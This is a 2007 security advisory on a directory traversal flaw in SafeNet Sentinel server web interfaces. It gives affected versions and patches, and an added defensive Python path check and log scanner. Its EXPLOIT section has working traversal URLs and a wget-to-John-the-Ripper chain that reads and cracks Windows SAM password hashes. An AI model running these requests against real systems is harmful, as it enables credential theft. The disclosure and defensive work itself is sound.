Directory Traversal in SafeNet Sentinel Protection Server and Keys Server Nov 26 2007 09:06PM
Elliot Kendall (ekendall brandeis edu)
SUMMARY
=======

SafeNet Inc.'s Sentinel Protection Server and Sentinel Keys Server
products include web servers which are vulnerable to directory
traversal attacks. A remote attacker could exploit these
vulnerabilities to read arbitrary files with the permissions of the web
server, typically SYSTEM.

AFFECTED SOFTWARE
=================

* Sentinel Protection Server 7.0.0 through 7.4.0 and possibly below
* Sentinel Keys Server 1.0.3 and possibly below

UNAFFECTED
==========

* Sentinel Protection Server 7.4.1
* Sentinel Keys Server 1.0.4

IMPACT
======

A remote attacker could exploit this vulnerability to read sensitive
files on the affected system. Attractive targets include the SAM
registry hive, which contains the system's local password hashes.

DETAILS
=======

Sentinel Protection Server and Sentinel Keys Server run web servers on
ports 6002 and 7002, respectively, to allow remote monitoring of key
use. The web server software does not sanitize request paths correctly
before using them in system calls. As a result, an attacker can request
files outside the web server's directory root by using the ../ notation
to refer to the parent directory of the current directory.

SOLUTION
========

Upgrade to Sentinel Protection Server 7.4.1 and Sentinel Keys Server
1.0.4.

First upgrade the Sentinel Driver software to 7.4.0 if you are using an
earlier version.

http://safenet-inc.com/support/files/Sentinel_Protection_Installer_7.4.0.zip

Then install "Security Patch to Sentinel Protection Installer 7.4.0"

http://safenet-inc.com/support/files/SPI740SecurityPatch.zip

EXPLOIT
=======

Most popular web browsers are not able to display URLs exploiting
this problem. I recommend using wget or lynx instead.

Substitute port 7002 to target Keys Server instead of Protection
Server.

This example will retrieve the C:\boot.ini file.

http://XX.XX.XX.XX:6002/../../../../../../boot.ini

This example will retrieve a copy of the target system's SAM registry
hive from the Windows repair folder:

http://XX.XX.XX.XX:6002/../../../../../../winnt/repair/sam

With the SAM and SYSTEM registry hives, it is possible to extract the
system's local password hashes for offline cracking. For example, using the
bkhive, samdump2, and John the Ripper tools:

$ wget -q http://XX.XX.XX.XX:6002/../../../../../../winnt/repair/sam
$ wget -q http://XX.XX.XX.XX:6002/../../../../../../winnt/repair/system
$ bkhive system keyfile
$ samdump2 sam keyfile > hashes
$ john --wordlist=all hashes

http://ophcrack.sourceforge.net/bkhive.php
http://www.openwall.com/john/
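Added example (not SafeNet's code and not part of the advisory): the kind of request-path check the DETAILS section says these web servers lack, followed by the same check run over constructed access-log lines to flag the two requests quoted in the EXPLOIT section. The document root and the log format are assumptions made for the illustration.

```python
import posixpath
import re
from urllib.parse import unquote

# Assumed document root for the illustration; not a real product path.
DOC_ROOT = "/opt/sentinel/www"


def resolve_under_root(doc_root, request_path):
    """Map a request path onto the filesystem, or return None if it escapes doc_root.

    The servers in the advisory skipped this step, so a request for
    /../../../../../../boot.ini walked up out of the document root.
    """
    # Decode percent-encoding and treat '\' as a separator (the product runs on
    # Windows) BEFORE normalising, so the '..' segments are seen in every form.
    decoded = unquote(request_path).replace("\\", "/")
    # normpath collapses '.' and '..' segments; joining onto the root first means
    # a leading '..' cannot survive as a relative component.
    resolved = posixpath.normpath(posixpath.join(doc_root, decoded.lstrip("/")))
    # Prefix test with the trailing '/' so '/opt/sentinel/www2' does not pass.
    if resolved != doc_root and not resolved.startswith(doc_root + "/"):
        return None
    return resolved


# Constructed access-log lines in common log format (the advisory does not show
# the product's own log format); the two flagged paths are the ones quoted above.
SAMPLE_LOG = """\
10.0.0.5 - - [26/Nov/2007:21:06:00 -0500] "GET /index.html HTTP/1.0" 200 1843
10.0.0.9 - - [26/Nov/2007:21:06:03 -0500] "GET /../../../../../../boot.ini HTTP/1.0" 200 211
10.0.0.9 - - [26/Nov/2007:21:06:05 -0500] "GET /../../../../../../winnt/repair/sam HTTP/1.0" 200 24576
10.0.0.5 - - [26/Nov/2007:21:06:09 -0500] "GET /status/keys.html HTTP/1.0" 200 902
"""

REQUEST_RE = re.compile(r'^(\S+) .*? "(?:GET|HEAD|POST) (\S+) HTTP/')


def flag_traversal(log_text, doc_root=DOC_ROOT):
    """Return (client, path) for each logged request whose path escapes doc_root."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if m and resolve_under_root(doc_root, m.group(2)) is None:
            hits.append((m.group(1), m.group(2)))
    return hits


if __name__ == "__main__":
    for client, path in flag_traversal(SAMPLE_LOG):
        print(f"traversal attempt from {client}: {path}")
```

The same prefix test applies to any file-serving code: resolve first, then compare against the root, never the other way round.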

ACKNOWLEDGMENTS
===============

Thanks to SafeNet for patching this vulnerability and for working with
me on this advisory.

According to Digital Defense, Inc.'s advisory, Corey Lebleu originally
discovered this problem on October 10th, 2007. I discovered the same
vulnerability independently on October 29th, 2007. I have no reason to
doubt Digital Defense, Inc.'s claim, and do not claim to have
discovered the problem first.

REVISION HISTORY
================

2007-11-26 original release

--
Elliot Kendall <ekendall (at) brandeis (dot) edu [email concealed]>
Network Security Architect
Brandeis University

Trouble replying? See http://people.brandeis.edu/~ekendall/sign/